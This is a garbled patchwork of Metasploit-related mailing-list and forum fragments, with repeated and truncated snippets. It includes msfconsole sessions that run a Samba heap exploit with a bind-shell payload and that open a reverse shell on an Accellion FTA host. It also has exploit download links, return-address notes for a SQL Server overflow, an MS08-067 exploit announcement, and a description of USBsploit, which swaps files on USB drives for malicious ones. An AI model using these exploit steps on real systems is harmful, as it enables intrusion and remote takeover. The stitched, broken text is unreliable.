msf
>
>
> Example
> =======
>
> # /msf3/msfconsole
>
> _ _ _ _
> | | | | (_) |
> _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
> | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
Example
=======
# /msf3/msfconsole
_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
> With this information, we ran our exploit against the ASUS Eee PC using
> the Debian/Ubuntu target (Xandros is based on Corel Linux, which is
> Debian based).
>
>
> msf > use linux/samba/lsa_transnames_heap
> msf exploit(lsa_transnames_heap) > set RHOST 192.168.50.10
> RHOST => 192.168.50.10
> msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp
> PAYLOAD => linux/x86/shell_bind_tcp
> msf exploit(lsa_transnames_heap) > show targets
With this information, we ran our exploit against the ASUS Eee PC using
the Debian/Ubuntu target (Xandros is based on Corel Linux, which is
Debian based).
msf > use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set RHOST 192.168.50.10
RHOST => 192.168.50.10
msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp
PAYLOAD => linux/x86/shell_bind_tcp
msf exploit(lsa_transnames_heap) > show targets
# svn co https://www.metasploit.com/svn/framework3/trunk/
# cp enumerator_asterisk_nat_peers.rb trunk/modules/auxiliary/scanner/sip/
# cd trunk
# msfconsole
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
With this information, we ran our exploit against the ASUS Eee PC using
the Debian/Ubuntu target (Xandros is based on Corel Linux, which is
Debian based).
msf > use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set RHOST 192.168.50.10
RHOST => 192.168.50.10
msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp
PAYLOAD => linux/x86/shell_bind_tcp
msf exploit(lsa_transnames_heap) > show targets
PDF:
http://security-assessment.com/files/documents/advisory/Final_Draft-Multiple_Stack_Buffer_Overflows.pdf
TXT:
http://security-assessment.com/files/documents/advisory/Final_Draft-Multiple_Stack_Buffer_Overflows.txt
POC: http://security-assessment.com/files/finaldraft8poc.zip
MSF: http://security-assessment.com/files/finaldraft8.rb
NOTE: Tested on v8.01, latest WinXPSP3. No DEP bypass - dodgy PoC.
StoryBoard Quick 6 Stack Buffer Overflow (unpatched)
PDF:
http://www.security-assessment.com/files/documents/advisory/Storyboard_Quick6-Stack_Buffer_Overflow.pdf
named 'insert_plugin_meta_info' which is vulnerable to an input
validation flaw in a call to system(). This provides access to the
'soggycat' user account, which has sudo privileges to run the
primary admin tool as root.
msf exploit(accellion_fta_mpipe2) > set RHOST 192.168.198.151
msf exploit(accellion_fta_mpipe2) > exploit
[*] Started reverse handler on 192.168.198.135:4444
[*] Command shell session 1 opened (192.168.198.135:4444 ->
192.168.198.151:42239) at 2010-11-15 23:50:35 -0600
https://www.securinfos.info/VNSECON2007
Covered topics:
* usage, enhancement and exploit modules development for the Metasploit
Framework
* Speeding Up the exploits' Development prOcess, Kill and Undo: the MSF
eXploit Builder
The last version of the presented tool "MSF eXploit Builder" should be
released in few days at:
https://www.securinfos.info/metasploit/MSF_XB.php
Hi there,
MSFXDC (MetaSploit Framework eXploits Development Contest) is a
challenge where the main goal is to code the largest number of new
Metasploit Framework exploits modules.
https://www.securinfos.info/metasploit/msfxdc.php
Your mission, if you choose to accept it, is to code new exploits
modules for the Metasploit Framework (latest 3.x version).
Exploits modules must be new regarding the current Metasploit Framework
can apply polymorphism in an exploit is check how many return addresses it
will be able to use in its code.
In this particular vulnerability there, at least, two public return
addresses: David Litchfield’s 0x42b48774 (“call esp” @ SQLSORT.DLL”) and
MSF’s 0x42b0c9dc (“jmp esp” @ SQLSORT.DLL). However, there are much more
DLLs we can try to find new return addresses, and we are not sure that there
are no more return addresses in this particular DLL, yet.
From my research, I found two more return addresses in the SQLSORT.DLL and
there are much more return addresses in others DDLs. The best way to find
Having not found one (except msf) that reliably works against my own setup
thought of writing my own MS08-067 exploit piece. Plugged the shellcode for
win2k and win2k3[sp2]. No plans for updating the xp shellcode.
Grab the python here:
http://www.hackingspirits.com/vuln-rnd/vuln-rnd.html
-d
0x00 Tech Gyan - Using Metasploit with Nessus Bridge on Ubuntu
0x01 Tool Gyan - Armitage – The Ultimate Attack Platform for Metasploit
0x02 Mom's Guide - Penetration Testing with Metasploit Framework
0x03 Legal Gyan - Trademark Law and Cyberspace
0x04 Matriux Vibhag - The Exploitation Ka Baap MSF
Check http://chmag.in for articles.
PDF version can be download from:- http://chmag.in/issue/jul2011.pdf
Hope you'll enjoy the magazine. Please send your suggestions, feedback to info@chmag.in
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Exploits::Osx::Browser::Software_Update < Msf::Exploit::Remote
USB files remotely on multiple targets at the same time, a set of
extensions to dump can be specified. All EXE, PDF and LNK already
available on the USB targets can also be replaced by malicious ones,
or only the EXE files (same for PDF or LNK). USBsploit works through
Meterpreter sessions (wmic, railgun, process migration) with a minimal
(30M - not mini msf) modified version of Metasploit (updated to
v3.5.1-dev svn r11223 2010.12.04). The interface is a mod of SET (The
Social Engineering Toolkit).
Note that if wmic's not available on a target, railgun'll now be used
with GetLogicalDrives(), GetDriveTypeN() and GetVolumeInformationW().
Exploit
Here is a PoC exploit module for metasploit that you could use to reproduce the crash:
require 'msf/core'
module Msf
module Exploits
module Test
|
